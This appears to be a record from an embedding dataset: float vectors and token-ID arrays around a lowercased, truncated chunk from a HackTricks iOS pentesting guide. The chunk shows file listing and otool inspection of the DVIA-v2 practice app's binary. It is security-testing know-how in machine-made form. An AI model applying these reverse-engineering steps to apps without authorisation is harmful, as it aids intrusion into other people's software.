0.03295845538377762, 0.6718097925186157, -0.068888820707798, -0.5260719656944275, -0.15281829237937927, -0.6599107980728149, -0.6422380805015564, -0.10971501469612122, -0.04607570916414261, -0.13682690262794495, 0.3684482276439667, 0.6168627738952637, -0.8301534652709961, -0.24651207029819489, -0.4611169993877411, 0.8976250290870667, 0.2285841554403305, -0.04448825120925903, 0.7626844048500061, -0.16298381984233856, 0.5242757201194763, -0.8966049551963806, 4.57103967666626, 0.29508650302886963, 0.23639576137065887, 0.4408473074436188, 0.7218161225318909, 0.6895287036895752, 1.1878238916397095, -0.7806443572044373, 0.04342930391430855, -0.31103792786598206, 0.6160913705825806, -0.5791577696800232, 0.35530319809913635, 0.1916431039571762, 0.5180327892303467, 0.16512857377529144, -0.4150102436542511, 0.17834019660949707, 0.22549575567245483, -0.7150415778160095, -0.951324999332428, -0.41951286792755127, -0.5546033382415771, 1.2087745666503906, 0.39809703826904297, -0.5046268105506897, 0.22082607448101044, -0.6871569752693176, -0.21104970574378967, -0.2447035014629364, -0.6546940803527832, -0.8614505529403687, 0.18662238121032715, -0.5692775845527649, -0.5431122779846191, 0.04396045207977295, 0.31471195816993713, -0.5745730400085449, -0.3015749156475067, 0.3889085352420807, -0.2791941165924072, -0.5546448826789856, 0.0007400616887025535, -0.29955795407295227, 0.3337949514389038, 0.4614256024360657, -0.4620257616043091, 0.17239044606685638, 0.836520254611969, -0.6566372513771057, 0.6104113459587097, 0.28322121500968933, 0.7991912961006165, -0.1489839106798172, -0.40831512212753296, 0.05002161115407944, 0.40603107213974, -0.08587221056222916, 0.2683742344379425, 0.23819753527641296, 0.7785363793373108, -0.24883060157299042, -0.1470624804496765, -0.1341785490512848, -0.5490338802337646, 0.5951817035675049, -0.5382215976715088, 0.944283127784729, 0.5146031379699707, -0.6392651200294495, -0.2398124486207962, -0.31450438499450684, -0.5604169368743896, -0.5546817779541016, 0.8976161479949951, -0.5733383893966675, -0.20987766981124878, -0.02098733000457287, 0.29531314969062805, -0.9243560433387756, -0.02408803068101406, -0.7812559604644775, -0.744248628616333, 0.3760938346385956, 0.6459522247314453, 0.7443393468856812, -0.7458626627922058, -0.5882372260093689, 0.7296844124794006, 0.024802541360259056, 0.1724567413330078, 0.4072745442390442, -0.23549139499664307, -0.08686699718236923, 0.3451458811759949 ]
[ 2077, 1999, 1996, 24531, 1010, 2009, 3397, 6827, 4646, 2951, 1010, 10763, 4180, 2004, 2092, 2004, 1996, 4646, 1005, 1055, 9227, 12441, 1012, 2023, 14176, 2003, 5710, 2000, 5198, 1010, 2021, 5198, 2064, 1005, 1056, 4339, 2000, 2009, 1012, 4180, 1999, 2023, 14176, 2003, 2025, 6153, 2039, 1012, 1996, 8417, 1997, 2023, 19622, 2024, 2109, 2000, 9398, 3686, 1996, 3642, 8085, 1012, 2951, 14176, 1024, 5491, 1013, 3397, 2035, 1996, 5310, 1011, 7013, 2951, 1012, 1996, 4646, 2203, 5310, 17820, 2015, 1996, 4325, 1997, 2023, 2951, 1012, 5710, 2000, 5198, 1998, 5198, 2064, 4339, 2000, 2009, 1012, 4180, 1999, 2023, 14176, 2003, 6153, 2039, 1012, 1996, 10439, 2064, 4487, 19150, 10425, 2011, 4292, 24978, 3126, 6856, 10288, 20464, 13936, 19699, 24991, 3600, 6279, 14839, 1012, 3075, 1013, 3397, 2035, 6764, 2008, 4995, 1005, 1056, 5310, 1011, 3563, 1010, 2107, 2004, 17053, 2015, 1010, 18394, 1010, 16324, 1010, 1998, 3200, 2862, 1006, 20228, 2923, 1007, 9563, 6764, 1012, 16380, 18726, 2788, 2224, 1996, 4646, 2490, 1998, 17053, 2015, 4942, 4305, 2890, 16761, 3111, 1010, 2021, 1996, 10439, 2064, 3443, 7661, 4942, 4305, 2890, 16761, 3111, 1012, 3075, 1013, 17053, 2015, 1013, 3397, 4100, 1011, 14516, 17053, 2094, 6764, 1012, 8841, 2000, 5198, 1998, 5198, 2064, 1005, 1056, 4339, 2000, 2009, 1012, 4180, 1999, 2023, 14176, 2003, 2025, 6153, 2039, 1012, 1996, 9808, 2089, 3972, 12870, 2023, 14176, 1005, 1055, 6764, 8073, 2043, 1996, 10439, 2003, 2025, 2770, 1998, 5527, 2686, 2003, 2770, 2659, 1012, 3075, 1013, 4646, 2490, 1013, 3397, 14516, 6764, 4072, 2005, 2770, 1996, 10439, 1012, 8841, 2000, 5198, 1998, 5198, 2064, 1005, 1056, 4339, 2000, 2009, 1012, 4180, 1999, 2023, 14176, 2003, 6153, 2039, 1012, 1996, 10439, 2064, 4487, 19150, 10425, 2011, 4292, 24978, 3126, 6856, 10288, 20464, 13936, 19699, 24991, 3600, 6279, 14839, 1012, 3075, 1013, 18394, 1013, 2109, 2005, 23977, 5144, 2008, 2064, 29486, 2130, 2044, 2019, 4646, 2003, 25606, 1012, 2592, 2003, 5552, 1010, 16655, 12273, 2854, 13876, 2098, 1010, 2503, 1996, 4646, 5472, 8758, 1999, 1037, 20228, 2923, 5371, 2170, 1031, 14012, 1035, 8909, 1033, 1012, 20228, 2923, 1012, 2035, 1996, 3145, 1013, 3643, 7689, 8250, 2478, 24978, 20330, 3207, 7011, 11314, 2015, 2064, 2022, 2179, 1999, 2023, 5371, 1012, 1056, 8737, 1013, 2224, 2023, 14176, 2000, 4339, 5741, 6764, 2008, 2079, 2025, 2342, 2000, 29486, 2090, 10439, 18989, 1012, 3397, 2512, 1011, 14516, 17053, 2094, 6764, 1012, 8841, 2000, 5198, 1012, 4180, 1999, 2023, 14176, 2003, 2025, 6153, 2039, 1012, 1996, 9808, 2089, 3972, 12870, 2023, 14176, 1005, 1055, 6764, 8073, 2043, 1996, 10439, 2003, 2025, 2770, 1998, 5527, 2686, 2003, 2770, 2659, 1012, 2292, 1005, 1055, 2202, 1037, 3553, 2298, 2012, 1045, 3995, 4017, 1011, 9170, 1005, 1055, 4646, 14012, 1006, 1012, 10439, 1007, 14176, 2503, 1996, 14012, 14176, 1006, 1013, 13075, 1013, 16143, 1013, 14012, 1013, 4646, 1013, 23842, 2850, 2546, 22610, 2094, 1011, 1037, 2581, 22022, 1011, 4749, 7011, 1011, 1038, 22907, 2549, 1011, 1042, 9818, 2050, 28756, 27814, 2683, 2063, 2575, 2581, 1013, 1045, 3995, 4017, 1011, 9170, 1012, 10439, 1007, 1024, 27593, 3022, 2361, 1012, 1045, 3995, 4017, 1011, 9170 ]
hack_tricks
43.txt
5
on ( iphone : 11. 1. 2 ) [ usb ] # lsnsfiletype perms nsfileprotection... name - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -... - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - regular 420 none... rutger. htmlregular 420 none... mansi. htmlregular 420 none... splash. htmlregular 420 none... about. htmlregular 420 none... license. txtregular 420 none... sentinel. txtregular 420 none... readme. txtbinary reversinginside the < application - name >. app folder you will find a binary file called < application - name >. this is the file that will be executed. you can perform a basic inspection of the binary with the tool otool : otool - vh dvia - v2 # check some compilation attributes magic cputype cpusubtype caps filetype ncmds sizeofcmds flagsmh _ magic _ 64 arm64 all 0x00 execute 65 7112 noundefs dyldlink twolevel weak _ defines binds _ to _ weak pieotool - l dvia - v2 # get third party librariesdvia - v2 : / usr / lib / libc + +. 1. dylib ( compatibility version 1. 0. 0, current version 400. 9. 1 ) / usr / lib / libsqlite3. dylib ( compatibility version 9. 0. 0, current version 274. 6. 0 ) / usr / lib / libz. 1. dylib ( compatibility version 1. 0. 0, current version 1. 2. 11 ) @ rpath / bolts. framework / bolts ( compatibility version 1. 0. 0, current version 1. 0. 0 ) [... ] check if the app is encryptedsee if there is any output for : otool - l < app - binary > | grep - a 4 lc _ encryption _ infodisassembling the binarydisassemble the text section : ot
[ 0.21019446849822998, -0.6200411915779114, 0.09307822585105896, 0.5104637145996094, -0.3715747594833374, 0.20441874861717224, -0.6814696788787842, 0.59736567735672, 0.25588101148605347, 0.3718389570713043, 0.2226661741733551, -0.2988874018192291, 0.47067323327064514, -0.06376013159751892, -0.9178040027618408, -0.08708232641220093, -0.761931300163269, 0.061212409287691116, -0.9048309326171875, -0.20228584110736847, 0.2677604854106903, 0.3228389322757721, -0.7065616846084595, -0.6473258137702942, 0.06019711494445801, 0.4920758008956909, 0.7730030417442322, 0.17352387309074402, 1.215203881263733, 0.5037035942077637, -0.011933738365769386, -0.3535461127758026, 0.1196226105093956, -0.5941209197044373, -0.260435551404953, -0.41203922033309937, 0.7194809317588806, -0.5249276161193848, 0.02676641382277012, -0.3975045680999756, 0.20612239837646484, -0.11926597356796265, 0.4711737334728241, -0.5377265810966492, -1.2774996757507324, -1.1828640699386597, 0.2688913643360138, -0.47792601585388184, 0.35522082448005676, -0.07458604127168655, 0.016793733462691307, 0.018872445449233055, 0.20987339317798615, 0.017299391329288483, 0.4714770019054413, 0.10973081737756729, -0.2424127459526062, -0.24488969147205353, 0.002223354997113347, 0.2711872458457947, 0.07356090843677521, 0.7307692766189575, 0.518885612487793, -0.693353533744812, -0.08315185457468033, 0.32401344180107117, -0.04614716023206711, 0.13237537443637848, -0.26621052622795105, -0.39585649967193604, 0.2674936354160309, 0.8587731719017029, -0.7437493801116943, -0.5783694982528687, -0.3729889392852783, 0.08748631924390793, 0.0610773079097271, -0.43905121088027954, -0.07913707196712494, 0.6522341966629028, -0.6133397817611694, 0.4100750982761383, 0.49679964780807495, -0.17725969851016998, -0.5445869565010071, -0.3688221871852875, 0.7942090034484863, 0.8221018314361572, -0.35471099615097046, 0.1206117644906044, 0.013763670809566975, 0.27942246198654175, -0.6930176019668579, -0.30192577838897705, -0.19769713282585144, 1.1427221298217773, -0.5879547595977783, -0.05856718495488167, 0.26891058683395386, 0.03436082974076271, 0.8460492491722107, 0.29543331265449524, 0.5611891746520996, 0.7695145606994629, -0.5881126523017883, 0.5557503700256348, 0.31498435139656067, -0.612656831741333, -0.334333211183548, -0.2642802894115448, 0.8819977641105652, -0.5030155181884766, -0.1569875329732895, -0.6945549845695496, -0.6145379543304443, -0.2896007001399994, 0.5613870620727539, 0.09639304131269455, -0.5773277878761292, 0.7756280303001404, -0.09815192967653275, -0.3879234492778778, 0.6388130784034729, -0.6387816071510315, 0.1563631296157837, 0.20550286769866943, -0.2907511293888092, 0.49223965406417847, -0.45067381858825684, -0.9278359413146973, -0.027903879061341286, -0.05389213562011719, 0.3367989957332611, 0.4812445342540741, -0.5734037756919861, -0.15703541040420532, -0.012059473432600498, 0.1558251678943634, 0.8127613663673401, -0.7501487731933594, -0.004713458474725485, 0.31231817603111267, 0.20864474773406982, 1.5582026243209839, 0.3040570616722107, -0.13951534032821655, -0.17572800815105438, -0.07626183331012726, -0.39100056886672974, 0.6798842549324036, -0.19254665076732635, -0.041228361427783966, 0.763825535774231, -0.3120484948158264, -0.4120202660560608, 0.7618850469589233, 0.12798628211021423, 0.12772749364376068, -0.6971055865287781, -0.21599361300468445, -0.028287023305892944, 0.6129903197288513, -0.08938518166542053, 0.6638164520263672, 0.1867983043193817, 0.262807160615921, -0.7670286893844604, -0.47829508781433105, 0.013931178487837315, 0.14448638260364532, 0.4143894910812378, -0.1368127018213272, 0.12518687546253204, 0.5027201175689697, 1.6455364227294922, 0.23591962456703186, 0.25146961212158203, 0.1677539199590683, 0.8332940340042114, 0.6231796145439148, -0.6374608874320984, 0.5705503821372986, 0.04677789658308029, 0.8089087605476379, -0.08202746510505676, 0.4419902265071869, -0.383836567401886, -0.6263622641563416, -0.15166720747947693, -0.5953101515769958, -0.5996694564819336, 0.2680998742580414, -0.41431814432144165, 0.8607211709022522, 0.7413187623023987, 0.5355744957923889, -1.317650318145752, -0.1602456122636795, -0.29147833585739136, -1.5867830514907837, -0.4032379984855652, -0.02296949177980423, -0.4753221571445465, 0.6346067190170288, -0.662126362323761, -0.4116986095905304, 0.6510609984397888, 0.8027492165565491, -0.21255241334438324, 0.15118373930454254, 0.5671190023422241, 0.435947448015213, -0.8510733246803284, -0.560369074344635, 0.06211745738983154, -0.3616654872894287, -0.4643001854419708, 0.8457170128822327, -0.028122451156377792, 0.02792232483625412, -0.05358663573861122, 0.6530372500419617, 0.45157700777053833, 0.42178231477737427, -0.2551743686199188, -0.5043445229530334, 0.4346667230129242, -0.07635869830846786, -1.2709026336669922, -0.20283766090869904, 0.189026340842247, 0.5135891437530518, 0.4161522090435028, 1.0997267961502075, 0.037904657423496246, 0.07069491595029831, 0.6763028502464294, 0.2774418890476227, 0.20378853380680084, 0.47789496183395386, -0.0006073336116969585, 1.0781296491622925, 0.42711734771728516, 0.5099188089370728, 0.4758324921131134, 0.4039774239063263, 0.17870038747787476, -0.3740501403808594, 0.37444478273391724, 0.7086579203605652, -0.12215825170278549, 1.0447033643722534, 0.7518136501312256, 0.12324940413236618, -0.6509522795677185, -0.25931665301322937, 0.9928249716758728, 0.9523969292640686, -0.4605230689048767, -0.8942207098007202, -0.1366424858570099, -0.25702595710754395, -0.58211350440979, -0.12248313426971436, 0.18581131100654602, 0.052406929433345795, -0.20410075783729553, 0.24702779948711395, -0.06564885377883911, -0.6213864684104919, -1.0849778652191162, -0.5113624930381775, -1.0691053867340088, -0.47701770067214966, -0.6459148526191711, 0.13681626319885254, 0.695088803768158, -0.2450527399778366, 0.6867514848709106, -0.40718895196914673, -0.9417271614074707, 0.24991455674171448, 0.6628875136375427, 0.5300132036209106, 0.030274691060185432, -0.022283343598246574, -0.7821828126907349, 0.46911922097206116, 0.17115458846092224, 0.8247374892234802, 0.009798338636755943, -0.21964813768863678, -0.2461071014404297, 0.0256720669567585, 0.1543988436460495, -0.4126330018043518, 0.520724892616272, -0.05418897792696953, -0.4455561637878418, -0.12115707993507385, 0.5470821857452393, -0.08588474243879318, 0.3007435202598572, -0.06151946634054184, -0.6276698708534241, 0.6308626532554626, 0.048227179795503616, -0.1626807600259781, 0.36416327953338623, 0.3392481207847595, -1.130879282951355, 0.4084819257259369, -0.01845194585621357, 0.6790520548820496, -0.45959025621414185, 0.5631486177444458, 0.5018229484558105, 0.3050478994846344, -0.07059323787689209, -0.4800597131252289, 0.421362042427063, -0.4895952045917511, -0.385093629360199, 0.09583591669797897, -0.40089651942253113, -0.30181607604026794, 0.2693652808666229, -0.8517854809761047, 0.12085428833961487, -0.22945401072502136, -0.06158934533596039, -0.7059648633003235, -0.7079343199729919, 0.5878181457519531, -0.0328826867043972, 0.371829092502594, 0.193647101521492, -0.6707088351249695, -0.07303641736507416, 0.4849889576435089, 0.31021761894226074, -0.6265456676483154, 0.757601797580719, 0.767401933670044, -0.013826101087033749, 0.5830985903739929, 0.24139852821826935, -0.32506442070007324, 0.0367511622607708, 0.2963349521160126, -0.131810262799263, -0.1465771496295929, 0.3456142544746399, 0.4914771318435669, 0.15856458246707916, 0.4655817449092865, -0.6036917567253113, -0.02959040179848671, 0.46860572695732117, -0.06887887418270111, 0.2975746989250183, 0.13709117472171783, 0.022714318707585335, 0.3607141077518463, -0.27158042788505554, -0.2641258239746094, 0.03252148628234863, 0.35568109154701233, 0.5804211497306824, -0.23459938168525696, 0.9694554209709167, -0.27415531873703003, 0.05563267692923546, 0.994347095489502, -0.531059205532074, -0.4460551142692566, 0.6663417220115662, 0.0729026198387146, 1.086762547492981, -0.492790549993515, 0.24169014394283295, 0.26387763023376465, 0.07081221044063568, 0.7278609275817871, 0.16353492438793182, 0.0505359061062336, -0.5269299149513245, -0.4892437756061554, -0.10152048617601395, -0.7712514400482178, -0.20309367775917053, -0.07375863194465637, -0.11549641191959381, -0.3073056638240814, -1.0165194272994995, -0.8884652256965637, 0.3108108341693878, 0.3661874234676361, 1.539079189300537, 0.5220431089401245, 0.511407732963562, -0.16921885311603546, -0.26673710346221924, 0.48254114389419556, -0.05301222205162048, 0.5054755806922913, -0.20256829261779785, 0.7722792029380798, -0.5998139977455139, -0.3779638409614563, 0.08007405698299408, -0.17882387340068817, -0.2946196496486664, 0.2827480137348175, -0.31706860661506653, 0.3146907687187195, -0.24607834219932556, -0.14499370753765106, 0.4990180730819702, 0.3511068522930145, -0.8434436917304993, 0.3280889391899109, -0.19509094953536987, 0.9520339965820312, 0.08517725765705109, -0.6235561370849609, -0.47815802693367004, -0.9767645001411438, 0.47843092679977417, 0.3369276821613312, 0.3509567081928253, -0.29214462637901306, -0.9348824620246887, -0.19032001495361328, -0.9346701502799988, 0.16479188203811646, 0.2869698405265808, 0.4251091480255127, 0.6978432536125183, -0.7239526510238647, -0.5849575400352478, 0.5879204273223877, -0.4460180401802063, -0.2625579237937927, -0.010848390869796276, 0.20731744170188904, 0.5811833739280701, 0.7353019714355469, 0.4103124737739563, -0.26931631565093994, 0.18302024900913239, -0.6848695874214172, 0.7564131617546082, -0.7335729598999023, -0.37351012229919434, 0.28025826811790466, 0.057960040867328644, 0.3816988170146942, 0.0206347294151783, -0.6158432960510254, 0.14280995726585388, 0.13911321759223938, 0.46728381514549255, -0.4599250555038452, -0.7638511061668396, 0.8096742033958435, -0.4086403548717499, -0.5567883849143982, 0.502295970916748, 0.2686082124710083, 0.025919415056705475, 0.10922475159168243, -0.2657720148563385, -0.38474372029304504, 0.9064208269119263, -0.39083132147789, 1.0721298456192017, 0.11162684857845306, -0.2810283601284027, 0.1655968874692917, -0.464311808347702, 0.49853312969207764, -0.226862832903862, -0.040788684040308, -0.6625685095787048, -0.872626543045044, 0.1549752950668335, 0.40676647424697876, -0.10599544644355774, 0.2189565747976303, 0.052845485508441925, -0.3210563361644745, 0.01621805876493454, -0.33176666498184204, -0.3181662857532501, -0.670067548751831, -0.2656182050704956, -0.219526469707489, 0.01900741271674633, 0.2056075483560562, 0.38764044642448425, -0.4671225845813751, -0.6564949154853821, 0.5326910614967346, 0.0629686638712883, 0.44747093319892883, -1.019594430923462, 0.28371623158454895, -0.7433028221130371, 0.480182021856308, -0.7419621348381042, 0.018900252878665924, 0.026320805773139, -0.09364533424377441, 0.07910748571157455, 0.5224125385284424, 0.4582366645336151, -0.3696111738681793, -0.4641430079936981, 0.42153871059417725, 0.45496442914009094, -0.5399124026298523, -0.5242891311645508, 0.8445281982421875, -0.3842100501060486, 0.2194753885269165, -0.36552003026008606, -0.6145528554916382, -1.140699863433838, -0.7499401569366455, 0.4806438386440277, -0.7125319838523865, 0.22632408142089844, -0.17532233893871307, -0.5268649458885193, 0.10929176211357117, -0.3480496406555176, 0.27774322032928467, -0.6047255396842957, -0.7311907410621643, -0.4505006670951843, 0.01261666975915432, -0.18687787652015686, 0.06160451099276543, 0.13310293853282928, -0.6084019541740417, 0.03880965709686279, 1.1394550800323486, 0.2434156984090805, -0.37187305092811584, -0.7706454396247864, 0.23620441555976868, 0.6744548082351685, 0.013219988904893398, -0.42787742614746094, -0.7135998606681824, -0.13341420888900757, -0.1584072709083557, 0.033520620316267014, 0.5130923390388489, -0.534190833568573, 0.12897661328315735, -0.07196216285228729, 0.09917127341032028, 0.2457977682352066, -0.35761570930480957, -0.20929177105426788, -0.46199584007263184, 0.5444548726081848, -0.4847410023212433, 0.13878105580806732, -0.08917074650526047, 0.7895739674568176, 0.7466221451759338, -0.20598579943180084, -0.5586589574813843, 0.42763251066207886, -0.8063867092132568, -0.8203529119491577, 0.12058021128177643, 0.1502770036458969, 0.2612747251987457, -0.322469025850296, -0.1364874243736267, 0.4784238040447235, -0.7963289022445679, 0.586948573589325, 0.5928210020065308, 0.014160656370222569, -0.2096622735261917, -0.9018560647964478, 0.8376885056495667, 0.48155584931373596, -0.26973432302474976, 0.17012041807174683, -0.6924474239349365, -0.04330071061849594, 0.19700077176094055, -0.6117541790008545, 0.5240456461906433, -0.5944510698318481, -0.28085801005363464, 0.4266204833984375, -0.010481877252459526, 0.5340287089347839, 0.030982675030827522, -0.7598636150360107, 0.016018632799386978, 0.3680303394794464, -0.5181959271430969, -0.5027520060539246, 0.6533828973770142, 0.11224918812513351, -0.09774356335401535, 0.5646488070487976, 0.560895562171936, 0.1439855992794037, -0.18603208661079407, 0.7794678807258606, -0.5986504554748535, -0.5070803165435791, 0.7714020609855652, 0.5077835321426392, -0.7188129425048828, -0.19499576091766357, 0.18342137336730957, -0.41136226058006287, 0.028751740232110023, -0.6207456588745117, -0.6602070331573486, -0.09451603889465332, 0.20599448680877686, 0.41972965002059937, 0.3520222008228302, 0.12686578929424286, 0.332195520401001, -0.4049553871154785, 1.2282177209854126, -0.22159911692142487, 0.5352984070777893, 0.6415628790855408, -0.3060564696788788, -0.4372408390045166, -0.5358923673629761, 0.0636887475848198, -0.07535814493894577, 0.32271459698677063, 0.9500200152397156, -0.2739853262901306, 0.571118950843811, 0.17939084768295288, -0.2863270044326782, 0.5963906049728394, -0.10801204293966293, 0.11352860927581787, 0.8572553396224976, -0.2771024703979492, -1.2829416990280151, -0.5943695306777954, -0.15506307780742645, -0.21690888702869415, 0.39946845173835754, -0.05469709634780884, 0.07729911059141159, -0.02750816009938717, 0.16897836327552795, -0.08558126538991928, -0.8277556300163269, -1.1227176189422607, -0.84222012758255, -0.5532748699188232, 0.11067872494459152, -0.24335144460201263, 0.06397774815559387, -0.023214230313897133, -0.09239263832569122, -0.010888700373470783, -0.24246053397655487, 0.29917263984680176, -0.8573431372642517, -0.013516373932361603, -0.30335891246795654, 0.6207618713378906, -0.5263733267784119, -0.6920473575592041, -0.019717376679182053, -0.4062977731227875, -0.32716768980026245, -0.7420946955680847, -0.45319488644599915, 0.42774665355682373, -0.9342389702796936, 0.6973091959953308, -0.360207200050354, -0.159244567155838, -0.11379162967205048, -0.8859582543373108, 0.7797425389289856, 0.33623966574668884, -0.6570568084716797, 0.5565468072891235, -0.1997794806957245, -0.10484052449464798, 0.2745054364204407, -0.8566169738769531, -0.1944434642791748, 0.11707551777362823, 0.21227936446666718, 0.13942250609397888, 0.20536333322525024, -0.34149423241615295, -0.28738653659820557, -0.2193213850259781, -0.6116134524345398, 0.23887699842453003, -0.6051978468894958, 0.027749257162213326, -0.2572702169418335, -0.24374431371688843, 0.04217900335788727, 0.6806167960166931, 0.32450640201568604, 0.6630979180335999, -0.8466103076934814, 0.07798948138952255, 0.590349018573761, -0.47949156165122986, 0.1308586448431015, 0.2524341344833374, 0.30881768465042114, -0.1532345563173294, 0.04752792790532112, 0.1141417846083641, -0.08956755697727203, 0.23848716914653778, -0.39714813232421875, -0.27150875329971313, -0.4730874001979828, 0.02468099817633629, 0.48120203614234924, 0.3818877637386322, 0.19701428711414337, 0.31907251477241516, 0.07857786118984222, 0.0694609060883522, -0.8860718607902527, 0.13814221322536469, -1.0336607694625854, -0.10910055786371231, 0.19717495143413544, -0.6327596306800842, 0.057416461408138275, -0.14514866471290588, -0.6952033638954163, 0.24581825733184814, 0.15889759361743927, -0.559253990650177, -0.10476557910442352, 0.09033901989459991, 0.07102211564779282, 1.0715539455413818, -0.46889016032218933, -0.2367098033428192, -0.11410833150148392, 0.3221041262149811, -1.017471432685852, -1.1989800930023193, 0.36177849769592285, 0.7202072739601135, -0.08749072998762131, -0.376542866230011, -0.6533734798431396, 0.24225664138793945, -0.00510278157889843, -0.09554196149110794, -0.12786832451820374, 0.1788034439086914, -0.5483308434486389, 0.7566018104553223, 0.044749915599823, 0.19891183078289032, -0.45777854323387146, -0.19933223724365234, 0.35223308205604553, -0.2226480096578598, -0.8270825743675232, 0.4223814308643341, -0.30902913212776184, 0.13434115052223206, 0.5987460017204285, 0.6336714029312134, 0.18226578831672668, -0.05231637880206108, 0.0343351736664772, 0.3142625391483307, 0.6266440749168396, 0.40239983797073364, 0.4724707305431366, 0.06838018447160721, 0.6958175897598267, 0.727211058139801, -0.1433594524860382, -0.3018129765987396, 0.5961538553237915, 0.04706975817680359, -0.7008124589920044, -0.10307435691356659, -0.33130261301994324, -0.11807040125131607, 0.1316182166337967, -0.1875336766242981, 0.005579667165875435, -0.12363853305578232, -0.052479833364486694, -0.01207786425948143, 0.11106252670288086, 0.6975812315940857, -1.0046648979187012, 0.27555474638938904, -0.13266731798648834, -0.04789423942565918, 0.3083249032497406, 0.06693699955940247, -0.4377492666244507, 0.16479265689849854, 0.9418303966522217, 0.65285325050354, -0.34606486558914185, 0.5015127658843994, -0.6864798665046692, 0.24094222486019135, 0.4094681441783905, -0.06693648546934128, -0.5324095487594604, 0.005707133561372757, 0.015948038548231125, -0.07441623508930206, -0.639493465423584, 0.14462892711162567, -0.4956304430961609, -0.03830645978450775, 0.65430748462677, -0.5215109586715698, 0.18241971731185913, -0.14534875750541687, 0.5077936053276062, -0.018146919086575508, 0.030351117253303528, 0.23341244459152222, -0.44993987679481506, -0.5504992604255676, 0.737975537776947, 0.5171183943748474, 0.63665771484375, -0.014802715741097927, 1.047812581062317, -0.26092928647994995, 0.7053661346435547, 0.3799285292625427, -0.2655453681945801, -0.39794623851776123, -0.22751939296722412, 0.09768007695674896, -1.0115690231323242, 0.2582237124443054, -0.4238879978656769, 0.6194621324539185, 0.37610793113708496, -0.17498449981212616, -0.5318542122840881, -0.021023215726017952, -0.6027735471725464, -0.6247457265853882, 0.7583441138267517, -0.16465191543102264, -0.31787919998168945, -0.06493882834911346, -0.09253989160060883, 0.5117165446281433, 0.7195322513580322, -0.45554712414741516, -0.6744853258132935, -0.43262946605682373, 0.1629277616739273, -0.6385623216629028, 0.9841341972351074, -0.3378799259662628, 0.0496925413608551, -0.5718941688537598, -1.44605553150177, -0.4746100604534149, -0.4170529842376709, -0.509837806224823, -0.17609840631484985, 0.20999900996685028, 0.617825984954834, 0.5916781425476074, 0.44674405455589294, 0.06808093935251236, -0.4177166521549225, 0.13303115963935852, 1.0685815811157227, -0.09914988279342651, 0.8956894874572754, 0.25213295221328735, 0.46262127161026, 0.4060538411140442, -0.3581400513648987, 0.34052804112434387, -0.6072958111763, 0.14527207612991333, -0.28853681683540344, 0.15515491366386414, -0.7819836735725403, -0.17395755648612976, 0.3871387541294098, 0.3368312418460846, 0.04311149939894676, 0.07583372294902802, -1.4703738689422607, 0.2780930697917938, -0.8557700514793396, 0.3011820316314697, -0.1205497682094574, -0.16600219905376434, 0.20355816185474396, 0.32262635231018066, 0.3759910464286804, -1.0811022520065308, 4.321469783782959, 0.72066730260849, -0.5151101350784302, 0.1914631873369217, 0.3815571963787079, 0.3672168254852295, 1.1013227701187134, -0.050218936055898666, 0.21076439321041107, -0.628645122051239, -0.05991126224398613, -0.2177029699087143, 1.1568409204483032, 0.16576392948627472, 0.42553284764289856, 0.5012240409851074, -0.31191739439964294, 0.12516765296459198, 0.5777816772460938, -0.8075700402259827, -1.1677162647247314, -0.2563597559928894, -0.1666833758354187, 1.3220703601837158, 0.16736866533756256, -0.06800989806652069, 0.5899771451950073, -0.5523078441619873, 0.08784027397632599, -0.40519478917121887, 0.3062463104724884, -0.5936011672019958, 0.22993740439414978, -1.01651930809021, -0.8134183883666992, -0.14338542520999908, 0.33682867884635925, -0.8414251208305359, -0.16841696202754974, 0.4954802095890045, -0.0405438058078289, -0.19016622006893158, -0.18451423943042755, -1.0034247636795044, 0.3527325391769409, 0.7686986327171326, -0.6541693806648254, 0.5313109755516052, 0.6967964768409729, -1.045977234840393, 0.649925708770752, -0.10125023871660233, 0.4332326054573059, 0.40630221366882324, -0.6176199913024902, 0.3793095350265503, 0.1793067455291748, -0.21444684267044067, -0.08165954053401947, -0.36074644327163696, 0.5119864344596863, -0.6568465828895569, 0.07613476365804672, -0.44072526693344116, -0.5602975487709045, 0.27719828486442566, 0.34378352761268616, -0.11174894124269485, 0.3301352560520172, -0.4279848635196686, 0.05948055163025856, -0.2442229986190796, -0.3874923288822174, -0.3768254518508911, 1.2016946077346802, 0.2739284038543701, -0.23573288321495056, 0.49292507767677307, 0.22229111194610596, -0.32911255955696106, -0.5123834013938904, -0.865090548992157, -0.8981002569198608, 0.34366557002067566, 0.5583096742630005, 0.6167241334915161, -0.43504753708839417, -0.7213473916053772, 0.2622767686843872, -0.05116909369826317, 0.2695969343185425, 0.050436049699783325, -0.5231139063835144, 0.0911671370267868, 0.09413997083902359 ]
[ 2006, 1006, 18059, 1024, 2340, 1012, 1015, 1012, 1016, 1007, 1031, 18833, 1033, 1001, 1048, 2015, 3619, 8873, 7485, 18863, 2566, 5244, 24978, 8873, 2571, 21572, 26557, 3508, 1012, 1012, 1012, 2171, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1012, 1012, 1012, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 3180, 17442, 3904, 1012, 1012, 1012, 21766, 2102, 4590, 1012, 16129, 2890, 24848, 2906, 17442, 3904, 1012, 1012, 1012, 16042, 2072, 1012, 16129, 2890, 24848, 2906, 17442, 3904, 1012, 1012, 1012, 17624, 1012, 16129, 2890, 24848, 2906, 17442, 3904, 1012, 1012, 1012, 2055, 1012, 16129, 2890, 24848, 2906, 17442, 3904, 1012, 1012, 1012, 6105, 1012, 19067, 7913, 24848, 2906, 17442, 3904, 1012, 1012, 1012, 16074, 1012, 19067, 7913, 24848, 2906, 17442, 3904, 1012, 1012, 1012, 3191, 4168, 1012, 19067, 2102, 21114, 2854, 7065, 2545, 2075, 7076, 5178, 1996, 1026, 4646, 1011, 2171, 1028, 1012, 10439, 19622, 2017, 2097, 2424, 1037, 12441, 5371, 2170, 1026, 4646, 1011, 2171, 1028, 1012, 2023, 2003, 1996, 5371, 2008, 2097, 2022, 6472, 1012, 2017, 2064, 4685, 1037, 3937, 